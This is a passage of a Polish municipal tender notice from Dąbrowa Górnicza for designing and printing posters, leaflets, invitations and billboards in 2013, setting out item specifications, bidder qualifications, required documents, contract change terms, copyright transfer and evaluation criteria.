termin wykonania i dostarczenia plakatów do Zamawiającego liczony od dnia zaakceptowania projektu - nie dłużej niż 7 dni

50.Projekt i druk zaproszeń z okazji obchodów Dnia Ziemi
szacowany nakład  30 szt.
format 300 X 105 składane na pół
kolor pełny
papier  kreda min. 250 g
częstotliwość dostawy jednorazowo
termin wykonania projektu  zaproszenia  liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2 dni
termin wykonania i dostarczenia  zaproszeń  do Zamawiającego liczony od dnia zaakceptowania projektu - nie dłużej niż 7 dni

51.Projekt i druk plakatów  z  zakresu udzielania pomocy zwierzętom dziko żyjącym
szacowany nakład  300 szt.
format A 3
kolor pełny
papier offsetowy min. 100 g
częstotliwość dostawy jednorazowo
termin wykonania projektu  plakatu  liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2 dni
termin wykonania i dostarczenia plakatów do Zamawiającego liczony od dnia zaakceptowania projektu - nie dłużej niż 7 dni

52.Projekt i druk ulotek informacyjnych - Światowy Tydzień Przedsiębiorczości
szacowany nakład  700 szt.
format  1/3  A 4
kolor 4+4
papier satyna  min. 200 g
częstotliwość dostawy jednorazowo
termin wykonania projektu ulotki  liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2 dni
termin wykonania i dostarczenia  ulotek do Zamawiającego liczony od dnia zaakceptowania projektu - nie dłużej niż 2 dni

53.Projekt i druk plakatów  - Światowy Tydzień Przedsiębiorczości
szacowany nakład  100 szt.
format A 2
kolor 4+0
papier kreda min. 120 g
częstotliwość dostawy jednorazowo
termin wykonania projektu plakatu liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2 dni
termin wykonania i dostarczenia plakatów do Zamawiającego liczony od dnia zaakceptowania projektu - nie dłużej niż 2 dni

54.Projekt i druk zaproszeń na seminarium gospodarcze - Światowy Tydzień Przedsiębiorczości
szacowany nakład  250szt.
format A4  dzielone na 3
kolor 4+4
papier  kreda min. 250 g błysk
częstotliwość dostawy jednorazowo
termin wykonania projektu zaproszenia  liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2 dni
termin wykonania i dostarczenia  zaproszeń do Zamawiającego liczony od dnia zaakceptowania projektu - nie dłużej niż 3 dni

55.Projekt i wydruk plakatów  - tereny inwestycyjne w Dąbrowie Górniczej
szacowany nakład  5 szt.
format 700 X 1000
kolor 4+0
papier fotograficzny 
częstotliwość dostawy jednorazowo
termin wykonania projektu plakatu liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2 dni
termin wykonania i dostarczenia plakatów do Zamawiającego liczony od dnia zaakceptowania projektu - nie dłużej niż 14 dni

56.Projekt i druk ulotek  obustronnych Dąbrowski Bank Ziemi 
szacowany nakład  500 szt.
format  210X 99
kolor 4+4
papier satyna  min. 200 g
częstotliwość dostawy jednorazowo
termin wykonania projektu ulotki  liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2 dni
termin wykonania i dostarczenia  ulotek  do Zamawiającego liczony od dnia zaakceptowania projektu - nie dłużej niż 14 dni

57.Projekt i druk plakatów promujących imprezy plenerowe organizowane w ramach Święta ul.3 Maja 
szacowany nakład  100 szt.
format  A2
kolor 4+0
papier kreda  min. 135 g
częstotliwość dostawy jednorazowo
termin wykonania projektu plakatu  liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 3 dni
termin wykonania i dostarczenia plakatów do Zamawiającego liczony od dnia zaakceptowania projektu - nie dłużej niż 7 dni

58.Projekt i druk plakatów promujących  V edycję Konkursu o Nagrodę Prezydenta Dąbrowy Górniczej wyróżniająca się praca dyplomowa
szacowany nakład  100 szt.
format  A2
kolor 4+0
papier kreda  min. 135 g
częstotliwość dostawy jednorazowo
termin wykonania projektu plakatu liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 3 dni
termin wykonania i dostarczenia  plakatów do Zamawiającego liczony od dnia zaakceptowania projektu - nie dłużej niż 7 dni

59.Skład wg  przekazanego projektu i druk rozkładówki tematycznej  - rewitalizacja 
szacowany nakład  200 szt.
format  630X210 ( składana dwukrotnie do formatu 210x210)
kolor 4+4
papier kreda mat   min. 300 g
uszlachetnienia: lakier offsetowy matowy na całości
częstotliwość dostawy jednorazowo
termin wykonania projektu rozkładówki liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 3 dni
termin wykonania i dostarczenia rozkładówek  do Zamawiającego liczony od dnia zaakceptowania projektu - nie dłużej niż 7 dni

3.2. Zadanie II: Wykonanie materiałów reklamowych na billboardy
1. Projekt materiałów reklamowych na billboardy
szacowana ilość projektów - 18 sztuk
częstotliwość wykonania  - jednorazowo dla każdego projektu
termin wykonania projektu billboardu liczony od dnia przekazania przez Zamawiającego materiałów - nie dłużej niż 2  dni
  
2. Druk materiałów reklamowych na billboardy
format 3 m x 5 m
kolor 4+0
papier billboardowy, minimum 120g, przeznaczony do druku eko-solventowego
szacowana ilość drukowanych billboardów - 110 sztuk
częstotliwość dostawy - jednorazowo dla każdego projektu, przy czym jednorazowa ilość drukowanych billboardów będzie uzależniona od bieżących potrzeb Zamawiającego
termin wykonania i dostarczenia do Zamawiającego billboardu liczony od dnia zaakceptowania projektu - nie dłużej niż  3 dni
Dalsza część przedmiotu zamówienia znajduje się w sekcji IV.4.16)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających w stosunku do zamówienia podstawowego, o których mowa w art. 67 ust.1 pkt. 6 Ustawy.
Realizacja zamówień uzupełniających odbywać się będzie w zakresie przewidzianym przedmiotem zamówienia i określonym kodami CPV z uwzględnieniem podziału na części.
Wartość szacunkowa zamówień uzupełniających wyniesie nie więcej niż 50% wartości zamówienia podstawowego z uwzględnieniem podziału na części.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.81.00.00-5, 79.82.25.00-7, 79.82.30.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga od Wykonawców wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Zamawiający żąda złożenia oświadczenia z art. 22 ust. 1 ustawy i jego weryfikacja zostanie przeprowadzona wg formuły: spełnia- nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał (lub wykonuje) należycie:

Zadanie I:
- minimum 2 usługi polegające  na wykonaniu lub wykonywaniu projektu i druku ulotek, plakatów, zaproszeń, informatorów, broszur, dyplomów, rozkładówek, notesów  o wartości nie mniejszej niż 50.000 zł  brutto każda przy czym każda usługa powinna zawierać co najmniej 5 różnych produktów z w/w katalogu produktów,
- minimum 1 usługę polegającą na wykonaniu lub wykonywaniu projektu i druku kalendarzy, pocztówek i kartek świątecznych, o wartości nie mniejszej niż 20.000 zł brutto każda.

Zadanie II:
Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał (lub wykonuje) należycie minimum 1 usługę polegającą na wykonaniu lub wykonywaniu  projektu i druku  billboardów 
o wartości nie mniejszej niż  25.000 zł brutto każda.

Uwagi (dotyczy Zadania I i Zadania  II): 
1. Jeżeli zakres wskazanych i udokumentowanych, przez Wykonawcę w wykazie, usług jest szerszy niż wymagany przez Zamawiającego, Wykonawca winien w wykazie wskazać zakres i wartość usług odpowiadających zakresowi wymaganemu przez Zamawiającego.
2. Równowartość w złotych zadań rozliczanych w walutach obcych zostanie określona według średniego kursu złotego w stosunku do walut obcych ogłoszonego przez NBP obowiązującego w dniu, w którym opublikowane zostało ogłoszenie 
o niniejszym zamówieniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zadanie I 
Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje sprawnymi urządzeniami niezbędnymi do realizacji zamówienia, tj. 
- minimum jedna maszyna do druku offsetowego co najmniej 4-kolorowego, w formacie minimum B3, z prędkością druku co najmniej 15 tysięcy arkuszy/godzinę. 
- minimum 2 stacje graficzne. Każda stacja graficzna musi posiadać minimum dwa programy w pełnej wersji spośród wymienionych poniżej: 
                        - Adobe Photoshop, 
                        - Ilustrator,
                        - InDesign,
                        - Corel Draw.

Zadanie II
Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje sprawnymi urządzeniami niezbędnymi do realizacji zamówienia, tj. 
- minimum jedna maszyna do druku wielkoformatowego w rozdzielczości co najmniej 720X720 dpi, eko-solventowego.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje osobami zdolnymi do wykonania zadania stanowiącego przedmiot zamówienia:
- minimum 2 grafików  z co najmniej trzyletnim doświadczeniem zawodowym każdy.  
Dopuszcza się wykazanie tych samych grafików na każde zadanie w przypadku składania oferty na Zadanie I i Zadanie II.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Zamawiający żąda złożenia oświadczenia z art. 22 ust. 1 ustawy i jego weryfikacja zostanie przeprowadzona wg formuły: spełnia- nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wykonawcy potwierdzą, że oferowane usługi odpowiadają wymaganiom określonym przez Zamawiającego, jeśli każdy z Wykonawców ubiegających się o udzielenie zamówienia złoży wraz z ofertą:
 Zadanie I
 po 1 egzemplarzu nw. rodzajów próbek o następujących parametrach:

Plakat:
Format  min.B2, Kolor 4+0, Papier offset min. 100 g

Ulotka : 
Format min A4 ,papier offset min. 150 g , Kolor - 4+4, 

Zaproszenie:
Format A4 dzielone  min. na 2, Kolor 4+4, Papier kreda - min. 250g, 

Kartka świąteczna:
 kolor 4+4, kreda min. 200g

Zadanie II
1 egzemplarz projektu billboardu, zapisany na płycie CD stanowiący kompletny projekt billboardu zrealizowany przez Wykonawcę (tematyka projektu dowolna). Projekt powinien być zapisany na płycie CD w pliku podglądowym  JPG 
w rozdzielczości 1600 x 960 pikseli.

Uwaga :
Zgodnie z art. 97 ust.2 ustawy Zamawiający zwraca wykonawcom, których oferty nie zostały wybrane, na ich wniosek  złożone przez nich próbki.

Ocena spełniania warunków udziału w postępowaniu będzie dokonana w oparciu o złożone wraz z ofertą dokumenty potwierdzające spełnianie warunków udziału w postępowaniu wg formuły: spełnia - nie spełnia.

2. Do oferty należy przedłożyć:
2.1. Formularz ofertowy - załącznik nr 1/I i (-lub) 1/II do SIWZ (wskazana data podpisania);
2.2. Formularz cenowy - załącznik nr 2 do SIWZ - dotyczy Zadania I (wskazana data podpisania);
2.3. pełnomocnictwo do reprezentowania Wykonawcy - jeżeli zostało ustanowione bądź do reprezentowania Wykonawców wspólnie ubiegających się o zamówienie przedłożone w formie oryginału lub kopii poświadczonej przez notariusza (dotyczy również spółki cywilnej);
2.4. dokument określający stosunek łączący Wykonawcę z innymi podmiotami gwarantujący rzeczywisty dostęp do ich zasobów, wymagane w przypadku, gdy Wykonawca polega na ich zasobach na zasadach określonych w art. 26 ust. 2b  Ustawy, dotyczące w szczególności:
a) zakresu dostępnych wykonawcy zasobów innego podmiotu,
b) sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia,
c) charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem,
d) zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.
2.5. oświadczenie o braku podstaw do wykluczenia na podstawie art. 24 ust. 2 pkt 5 ustawy - załącznik nr 8 do SIWZ (wskazana data podpisania)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwości dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy w następujących przypadkach:
1. W zakresie zmiany terminów realizacji zamówienia, na skutek przyczyn nie leżących po stronie Wykonawcy:
1.1.Wystąpienie siły wyższej. Siła wyższa oznacza wydarzenie nieprzewidywalne i poza kontrolą stron niniejszej umowy, występujące po podpisaniu umowy, a powodujące niemożliwość wywiązania się z umowy w jej obecnym brzmieniu.
1.2. Skrócenia wymaganego terminu wykonania poszczególnych części zamówień ujętych w umowie, w przypadku konieczności natychmiastowej realizacji zamówienia lub na skutek zdarzeń losowych.
2. W pozostałym zakresie zmiany do umowy mogą dotyczyć następujących okoliczności:
2.1. zmniejszenia wynagrodzenia wykonawcy na skutek zmniejszenia ilości i wielkości zamówienia przez Zamawiającego, jednak zmniejszenie zamówienia nie może przekroczyć 20 % wartości umowy (brutto).
2.2. poprawy jakości lub innych parametrów charakterystycznych dla danego elementu zamówienia,
2.3. zmiany obowiązujących przepisów prawa,
2.4. rezygnacji z całości lub części zamówienia zgodnie z art. 145 Ustawy Pzp,
2.5. zmiany podatku VAT na skutek zmian w przepisach prawnych:
a) w przypadku zwiększenie stawki podatku VAT ceny brutto za wykonanie poszczególnych projektów i druków nie mogą być wyższe niż zadeklarowane w ofercie przez cały okres obowiązywania umowy. Maksymalna nominalna wartość umowy nie ulegnie zmianie w okresie obowiązywania umowy,
b) w przypadku zmniejszenie stawki VAT ceny brutto za wykonanie poszczególnych projektów i druków zostaną odpowiednio pomniejszone w odniesieniu do cen brutto zadeklarowanych w ofercie. Maksymalna nominalna wartość umowy może ulec zmniejszeniu.
3. W przypadku wystąpienia okoliczności wymienionych wyżej strony poinformują się natychmiast o ich zaistnieniu i w dobrej wierze rozpatrzą możliwość realizacji bądź rozwiązania umowy.
4. W przypadku wystąpienia okoliczności skutkujących niedotrzymaniem terminu realizacji zamówienia, stanowiących podstawę do zmiany ustalonych terminów, Wykonawca zobowiązany jest do niezwłocznego poinformowania o tym fakcie Zamawiającego i wystąpienia z wnioskiem o dokonanie wskazanej zmiany.
5. Z okoliczności stanowiących podstawę zmiany do umowy strony sporządzą protokół konieczności oraz aneks do umowy, w trybie art. 144 ustawy. 
6. Pozostałe kwestie odnoszące się do umowy uregulowane są w załączniku nr 9/I, 9/II do SIWZ - projekt umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.dabrowa-gornicza.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Dąbrowie Górniczej, ul. Graniczna 21, Wydział Promocji, Kultury i Sportu, piętro III.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.03.2013 godzina 09:30, miejsce: Urząd Miejski w Dąbrowie Górniczej, ul. Graniczna 21, parter stanowisko nr 13 - INFORMACJA.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamówienie nie jest finansowane ze środków Unii Europejskiej.
2. Zamawiający nie wymaga wniesienia zabezpieczenia należytego wykonania umowy. 
3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia
3.1. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia powinni spełniać warunki udziału w postępowaniu określone w pkt 8 SIWZ oraz złożyć dokumenty potwierdzające spełnianie tych warunków zgodnie z zapisami zawartymi w pkt 9 SIWZ.
3.2. W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców, dokumenty wymienione w pkt  9.2. i 9.4.4. SIWZ Wykonawcy składają odrębnie, natomiast dokumenty wymienione w pkt 9.1.2.- 9.1.4. SIWZ i 9.3 SIWZ  Wykonawcy składają łącznie, przy czym oświadczenie wymienione w pkt 9.1.1. SIWZ,  Formularz  ofertowy wymieniony w pkt 9.4.1. SIWZ oraz Formularz cenowy wymieniony w pkt 9.4.2. SIWZ - winny być podpisane przez uprawnionego przedstawiciela Wykonawców lub wspólnie (na jednym druku) przez wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia. 
3.3. Ponadto ww. Wykonawcy ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowania i zawarcia umowy w sprawie zamówienia publicznego. 
3.4. Wszelka korespondencja prowadzona będzie wyłącznie z  Pełnomocnikiem.
4. Uszczegółowienie sekcji II.1.3
Uwagi do przedmiotu zamówienia (dotyczy Zadania I i Zadania II):
1. Wszystkie terminy wykonania projektu oraz wykonania i dostarczenia przedmiotu zamówienia z Zadaniu I  i II  podane są w dniach roboczych. 
2. Zamówienie realizowane będzie do wysokości środków budżetowych zabezpieczonych na ten cel, z zastrzeżeniem pkt 3.4.4. SIWZ.
3. Podane ilości materiałów informacyjno-promocyjnych są ilościami szacunkowymi podanymi dla prawidłowej oceny wartości ofert celem określenia ewentualnych rabatów, bonifikat, upustów. 
4. Zamawiający zastrzega sobie prawo do zmniejszenia ilości  zamówienia. Podana wielkość zamówienia jest wielkością szacunkową i uzależniona będzie od faktycznych potrzeb Zamawiającego jednak wartość ilości materiałów, o którą Zamawiający zmniejszy zamówienie nie przekroczy 20 % wartości umowy (brutto).
5. W przypadku zmniejszenia ilości zamawianych materiałów wynagrodzenie Wykonawcy zostanie pomniejszone proporcjonalnie do ilości faktycznie zamówionych materiałów.
6. Zamawiający zastrzega sobie prawo w wyjątkowych sytuacjach do skrócenia wymaganego terminu wykonania projektu 
i druku materiałów informacyjno  - promocyjnych oraz w każdym momencie realizacji przedmiotu umowy do personalizacji wybranych materiałów informacyjno - promocyjnych.
7. W sytuacjach wymagających współdziałania w zakresie opracowywania poszczególnych projektów, Zamawiający zastrzega sobie prawo do dokonywania uzgodnień i projektowania w siedzibie Zamawiającego tj. 41-300 Dąbrowa Górnicza ul. Graniczna 21, nie częściej niż 1 raz w tygodniu i nie dłużej niż 3 godziny. 
8. Zamówienie realizowane będzie sukcesywnie według potrzeb Zamawiającego. 
9. Dowodem zrealizowania zamówień cząstkowych będzie podpisanie protokołu zdawczo - odbiorczego zaakceptowanego przez Zamawiającego i Wykonawcę.
10. Zamawiający wyraża każdorazowo akceptację treści i wzoru wykonywanych projektów - które w pełni odpowiadają jego wymaganiom, w formie elektronicznej, przy czym drukowane materiały każdorazowo wymagają ostatecznej akceptacji Naczelnika lub Kierownika Wydziału  zlecającego ich wykonanie. 
11. W razie braku akceptacji projektu przez Zamawiającego, Wykonawca zobowiązany jest do przedłożenia w terminie 2 dni nowego projektu.
12. Wykonawca zobowiązany jest do wprowadzania zmian w projektach zgodnie z sugestiami Zamawiającego do momentu ich ostatecznego zaakceptowania przez Zamawiającego.
13. W ramach realizacji przedmiotu zamówienia Wykonawca zobowiązany jest do dostawy zamawianych materiałów promocyjnych, własnym środkiem transportu i na własne ryzyko do siedziby Zamawiającego, tj. 41-300 Dąbrowa Górnicza ul. Graniczna 21.
14. Materiały te powinny być opisane, odpowiednio zabezpieczone przed zniszczeniem lub rozkompletowaniem. Wykonawca zobowiązany jest do wymiany zniszczonych egzemplarzy na nowe w terminie uzgodnionym z Zamawiającym. 
15. Zamawiający przekazywać będzie Wykonawcy treści merytoryczne do publikacji czy do zamieszczania na ulotkach, plakatach itp w formie elektronicznej.
16. W ramach wynagrodzenia, Wykonawca przenosi na Zamawiającego na zasadzie wyłączności, autorskie prawa majątkowe: do projektów powstałych i utrwalonych w jakiejkolwiek formie w ramach realizacji niniejszego zamówienia (m.in. zdjęć, rysunków, grafik); do nieograniczonego w czasie korzystania i rozporządzania projektami  na polach eksploatacji określonych w art. 50 ustawy z dnia 4 lutego1994 r. o prawie autorskim i prawach pokrewnych (tj. Dz. U. z 2006 r., Nr 90, poz. 631 z późn. zm.), w tym w szczególności na następujących polach eksploatacji:
a) utrwalanie i trwałe lub czasowe w całości lub części zwielokrotnianie w dowolnej ilości egzemplarzy i kopii projektów, dowolną techniką, w tym w szczególności techniką drukarską, reprograficzną, bądź analogową lub cyfrową przy zastosowaniu metody zapisu magnetycznego lub optycznego lub w jakiejkolwiek formie;
b) przeglądanie, dowolne modyfikowanie i wykorzystywanie projektów, w tym w szczególności:
- wprowadzanie do obrotu elektronicznego, w tym poprzez sieć Internet,
- umieszczanie w zasobach komputerów,
-  tłumaczenie, przystosowywanie, zmiany układu lub jakiekolwiek inne zmiany w projekcie,
- rozpowszechnianie, w tym użyczanie lub najem projektów lub ich kopii,
-  wykorzystywanie podczas pokazów publicznych,
-  wykorzystywanie projektów do prezentacji,
-  przesyłanie przy wykorzystaniu środków przekazu obrazu lub dźwięku,
c) prezentowanie, wyświetlanie, ukazywanie oraz wprowadzanie do pamięci komputera;
d) wielokrotne udostępnianie i przekazywanie projektów osobom trzecim z prawem do jego korzystania;
e) tworzenie utworów zależnych i pochodnych,
17. Autorskie prawa majątkowe, o których mowa w pkt 16 przechodzą na Zamawiającego  z chwilą podpisania  przez strony  protokołu zdawczo - odbiorczego z należytego wykonania poszczególnych części przedmiotu umowy.
18. Wykonawca  jest zobowiązany do przekazywania wykonanych i zaakceptowanych przez Zamawiającego projektów materiałów  na nośniku w formie płyty CD w wersji edytowalnej.  Przedmiotowy nośnik wraz z projektami powinien być dostarczony z każdą dostawą wydrukowanych materiałów.
19. Gdyby z przyczyn niezależnych od Zamawiającego obniżyła się wysokość środków przewidzianych przez Zamawiającego na realizację poszczególnych zadań lub wystąpiła inna ważna przyczyna uzasadniająca zmniejszenie  ilości szacowanych nakładów, nie może to stanowić podstawy do rozwiązania umowy przez Wykonawcę z winy Zamawiającego, ani do żądania kary umownej czy odszkodowania.  
20. Rozwiązania równoważne
Zamawiający dopuszcza zastosowanie rozwiązań równoważnych - tj. o parametrach technicznych i jakościowych nie gorszych niż określone w SIWZ - w odniesieniu do rozwiązań, których pochodzenie zostało określone przez Zamawiającego w SIWZ nazwą producenta.
Zgodnie z art. 30 ust. 5 Ustawy - Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez zamawiającego, jest obowiązany wykazać, że oferowane przez niego dostawy, usługi lub roboty budowlane spełniają wymagania określone przez zamawiającego, pod względem parametrów technicznych, użytkowych oraz eksploatacyjnych.
5. Uszczegółowienie kryteriów oceny ofert z podziałem na części zamówienia:
Zadanie I
Cena                                                        - 50 %
Kryterium niemierzalne - walory estetyczne - 50% 
1. W przypadku kryterium walory estetyczne: na podstawie przedłożonych wraz z ofertą rodzajów próbek: plakat, ulotka, zaproszenie i kartka świąteczna zgodnie z pkt 8.3.1 SIWZ.
